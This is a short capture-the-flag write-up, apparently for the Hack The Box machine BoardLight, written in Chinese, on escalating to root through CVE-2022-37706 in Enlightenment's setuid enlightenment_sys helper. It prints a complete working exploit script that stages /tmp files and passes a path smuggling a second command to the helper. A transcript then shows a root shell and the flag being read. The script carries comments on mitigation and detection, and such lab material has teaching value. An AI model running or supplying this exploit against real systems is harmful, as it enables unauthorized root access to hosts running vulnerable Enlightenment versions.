enlightenment CVE-2022-37706-LPE
1. 快速利用
受影响版本：0.25.4 之前
Enlightenment 0.25.4 之前的版本中，enlightenment_sys 允许本地用户提升权限：该程序被设置为 setuid root，并且系统库函数错误地处理了以 /dev/.. 子字符串开头的路径名。
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# cd CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# cat exploit.sh
#!/bin/bash
# Public proof-of-concept for CVE-2022-37706: local privilege escalation via
# the setuid-root enlightenment_sys helper shipped with Enlightenment releases
# before 0.25.4. Per the advisory text above, the helper mishandles pathnames
# that begin with a /dev/.. substring, which is what the staged paths below
# rely on.
# Mitigation: upgrade Enlightenment to 0.25.4 or later. Until then, clearing
# the setuid bit on enlightenment_sys (or restricting execution to a trusted
# group) removes the escalation path.
# Detection: setuid copies of enlightenment_sys, execve records (e.g. auditd)
# showing that helper launching mount with a source path containing "/dev/..",
# and unexpected /tmp/exploit or /tmp/net artifacts owned by an unprivileged
# user are the indicators worth alerting on.
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# Locate the first setuid (-perm -4000) enlightenment_sys anywhere on the
# filesystem; the full-tree find is what makes this step slow and noisy.
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
# Staging in /tmp: a mount-point directory, a directory whose name embeds
# ";/tmp/exploit", and a world-executable /tmp/exploit that only runs /bin/sh.
# These files are the main forensic trace left on a host where this was tried.
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
# The setuid helper is invoked to run /bin/mount with the crafted "/dev/../tmp/;..."
# source path. In the transcript below mount prints "can't find in /etc/fstab"
# for that path; on an unpatched host the helper still ends up spawning the
# staged /tmp/exploit as root (inferred from the transcript, not from this line).
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$ (id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~$ bash exp.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# ls /root
root.txt snap
# cat /root/root.txt
d05f6b6990676adcdcd16e393881ca11